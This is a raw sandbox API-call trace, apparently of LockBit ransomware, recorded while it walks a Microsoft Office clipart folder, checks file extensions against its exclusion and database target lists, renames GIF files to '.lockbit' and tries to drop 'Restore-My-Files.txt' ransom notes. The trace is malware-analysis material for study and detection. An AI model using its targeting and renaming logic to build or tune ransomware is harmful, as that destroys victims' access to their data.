BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0124.262] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.262] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.262] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0124.262] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0124.264] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.264] malloc (_Size=0xa6) returned 0x77d7a8 [0124.264] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0124.264] free (_Block=0x77d7a8) [0124.264] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099194.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.265] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.265] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.265] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x65dd0810, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x4dd3, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099195.GIF", cAlternateFileName="")) returned 1 [0124.265] lstrcmpiW (lpString1=".", lpString2="J0099195.GIF") returned -1 [0124.265] lstrcmpiW (lpString1="..", lpString2="J0099195.GIF") returned -1 [0124.265] PathFindExtensionW (pszPath="J0099195.GIF") returned=".GIF" [0124.265] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0124.265] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0124.265] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0124.265] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0124.265] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0124.265] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0124.265] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0124.265] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0124.265] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0124.265] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0124.265] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0124.265] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0124.265] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0124.265] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0124.265] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0124.265] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0124.265] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0124.265] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0124.265] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0124.265] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0124.266] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0124.266] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0124.266] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0124.266] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0124.266] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.266] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0124.266] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0124.266] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0124.266] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0124.266] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0124.266] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0124.266] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0124.266] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0124.266] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0124.266] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0124.266] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0124.266] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0124.266] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0124.266] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0124.266] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0124.266] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0124.266] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0124.266] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.266] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0124.266] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0124.267] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0124.267] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0124.267] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099195.GIF") returned 1 [0124.267] lstrcmpiW (lpString1="ntldr", lpString2="J0099195.GIF") returned 1 [0124.267] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099195.GIF") returned 1 [0124.267] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099195.GIF") returned -1 [0124.267] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099195.GIF") returned -1 [0124.267] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099195.GIF") returned 1 [0124.267] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099195.GIF") returned -1 [0124.267] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.267] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF") returned=".GIF" [0124.267] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0124.267] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0124.267] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0124.267] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0124.267] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0124.267] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0124.267] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0124.267] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0124.267] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0124.267] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0124.267] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0124.267] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0124.267] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0124.268] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0124.268] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0124.268] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0124.268] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0124.268] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0124.268] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0124.268] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0124.268] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0124.268] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0124.268] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0124.268] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0124.268] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0124.268] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0124.268] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0124.268] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0124.268] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF.lockbit") returned 72 [0124.268] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099195.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0124.269] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0124.269] malloc (_Size=0x40068) returned 0x3df0008 [0124.269] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=19923) returned 1 [0124.269] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.269] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.269] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0124.269] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.270] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0124.270] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 0x0 [0124.273] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.273] malloc (_Size=0xa6) returned 0x77d7a8 [0124.273] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0124.273] free (_Block=0x77d7a8) [0124.273] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099195.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.273] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.273] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.273] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x56321b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x3801, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099196.GIF", cAlternateFileName="")) returned 1 [0124.273] lstrcmpiW (lpString1=".", lpString2="J0099196.GIF") returned -1 [0124.273] lstrcmpiW (lpString1="..", lpString2="J0099196.GIF") returned -1 [0124.273] PathFindExtensionW (pszPath="J0099196.GIF") returned=".GIF" [0124.273] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0124.274] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0124.274] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0124.274] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0124.274] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0124.274] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0124.274] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0124.274] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0124.274] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0124.274] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0124.274] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0124.274] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0124.274] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0124.274] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0124.274] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0124.274] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0124.274] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0124.274] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0124.274] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0124.274] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0124.274] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0124.274] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0124.274] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0124.274] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0124.274] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.274] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0124.274] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0124.274] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0124.274] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0124.274] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0124.275] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0124.275] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0124.275] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0124.275] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0124.275] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0124.275] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0124.275] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0124.275] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0124.275] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0124.275] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0124.275] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0124.275] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0124.275] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.275] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0124.275] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0124.275] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0124.275] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0124.275] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099196.GIF") returned 1 [0124.275] lstrcmpiW (lpString1="ntldr", lpString2="J0099196.GIF") returned 1 [0124.275] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="J0099196.GIF") returned 1 [0124.275] lstrcmpiW (lpString1="bootsect.bak", lpString2="J0099196.GIF") returned -1 [0124.275] lstrcmpiW (lpString1="autorun.inf", lpString2="J0099196.GIF") returned -1 [0124.275] lstrcmpiW (lpString1="thumbs.db", lpString2="J0099196.GIF") returned 1 [0124.275] lstrcmpiW (lpString1="iconcache.db", lpString2="J0099196.GIF") returned -1 [0124.275] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0124.275] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF") returned=".GIF" [0124.275] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0124.322] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0124.322] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0124.322] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0124.323] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0124.323] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0124.323] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0124.323] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0124.323] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0124.323] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0124.323] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0124.323] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0124.323] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0124.323] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0124.323] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0124.323] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0124.323] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0124.323] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0124.323] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0124.323] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0124.323] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0124.323] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0124.323] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0124.323] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0124.323] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0124.323] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0124.323] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0124.323] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0124.323] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF.lockbit") returned 72 [0124.323] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\j0099196.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0124.325] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0124.325] malloc (_Size=0x40068) returned 0x3df0008 [0124.325] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=14337) returned 1 [0124.325] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.325] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.325] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0124.325] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0124.326] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0124.326] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0124.326] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0124.339] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0124.339] malloc (_Size=0xa6) returned 0x77d7a8 [0124.339] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x77d7a8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0124.373] free (_Block=0x77d7a8) [0124.373] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\J0099196.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0124.373] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0124.373] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0124.373] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbad71800, ftCreationTime.dwHighDateTime=0x1bd3246, ftLastAccessTime.dwLowDateTime=0x56321b30, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0xbad71800, ftLastWriteTime.dwHighDateTime=0x1bd3246, nFileSizeHigh=0x0, nFileSizeLow=0x2a92, dwReserved0=0x0, dwReserved1=0x0, cFileName="J0099197.GIF", cAlternateFileName="")) returned 1 [0124.373] lstrcmpiW (lpString1=".", lpString2="J0099197.GIF") returned -1 [0124.373] lstrcmpiW (lpString1="..", lpString2="J0099197.GIF") returned -1 [0124.373] PathFindExtensionW (pszPath="J0099197.GIF") returned=".GIF" [0124.373] lstrcmpiW (lpString1=".386", lpString2=".GIF") returned -1 [0124.373] lstrcmpiW (lpString1=".cmd", lpString2=".GIF") returned -1 [0124.373] lstrcmpiW (lpString1=".exe", lpString2=".GIF") returned -1 [0124.373] lstrcmpiW (lpString1=".ani", lpString2=".GIF") returned -1 [0124.373] lstrcmpiW (lpString1=".adv", lpString2=".GIF") returned -1 [0124.373] lstrcmpiW (lpString1=".theme", lpString2=".GIF") returned 1 [0124.373] lstrcmpiW (lpString1=".msi", lpString2=".GIF") returned 1 [0124.373] lstrcmpiW (lpString1=".msp", lpString2=".GIF") returned 1 [0124.373] lstrcmpiW (lpString1=".com", lpString2=".GIF") returned -1 [0124.374] lstrcmpiW (lpString1=".diagpkg", lpString2=".GIF") returned -1 [0124.374] lstrcmpiW (lpString1=".nls", lpString2=".GIF") returned 1 [0124.374] lstrcmpiW (lpString1=".diagcab", lpString2=".GIF") returned -1 [0124.374] lstrcmpiW (lpString1=".lock", lpString2=".GIF") returned 1 [0124.374] lstrcmpiW (lpString1=".ocx", lpString2=".GIF") returned 1 [0124.374] lstrcmpiW (lpString1=".mpa", lpString2=".GIF") returned 1 [0124.374] lstrcmpiW (lpString1=".cpl", lpString2=".GIF") returned -1 [0124.374] lstrcmpiW (lpString1=".mod", lpString2=".GIF") returned 1 [0124.374] lstrcmpiW (lpString1=".hta", lpString2=".GIF") returned 1 [0124.374] lstrcmpiW (lpString1=".icns", lpString2=".GIF") returned 1 [0124.374] lstrcmpiW (lpString1=".prf", lpString2=".GIF") returned 1 [0124.374] lstrcmpiW (lpString1=".rtp", lpString2=".GIF") returned 1 [0124.374] lstrcmpiW (lpString1=".diagcfg", lpString2=".GIF") returned -1 [0124.374] lstrcmpiW (lpString1=".msstyles", lpString2=".GIF") returned 1 [0124.374] lstrcmpiW (lpString1=".bin", lpString2=".GIF") returned -1 [0124.374] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.374] lstrcmpiW (lpString1=".shs", lpString2=".GIF") returned 1 [0124.374] lstrcmpiW (lpString1=".drv", lpString2=".GIF") returned -1 [0124.374] lstrcmpiW (lpString1=".wpx", lpString2=".GIF") returned 1 [0124.374] lstrcmpiW (lpString1=".bat", lpString2=".GIF") returned -1 [0124.374] lstrcmpiW (lpString1=".rom", lpString2=".GIF") returned 1 [0124.374] lstrcmpiW (lpString1=".msc", lpString2=".GIF") returned 1 [0124.374] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0124.374] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0124.374] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0124.375] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0124.375] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0124.375] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0124.375] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0124.375] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0124.375] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0124.375] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0124.375] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0124.375] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0124.375] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0124.375] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0124.375] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0124.375] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0124.375] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="J0099197.GIF") returned 1 [0124.375] lstrcmpiW (lpString1="ntldr", lpString2="J0099197.GIF") returned 1 [0124.375] lstrcmpiW 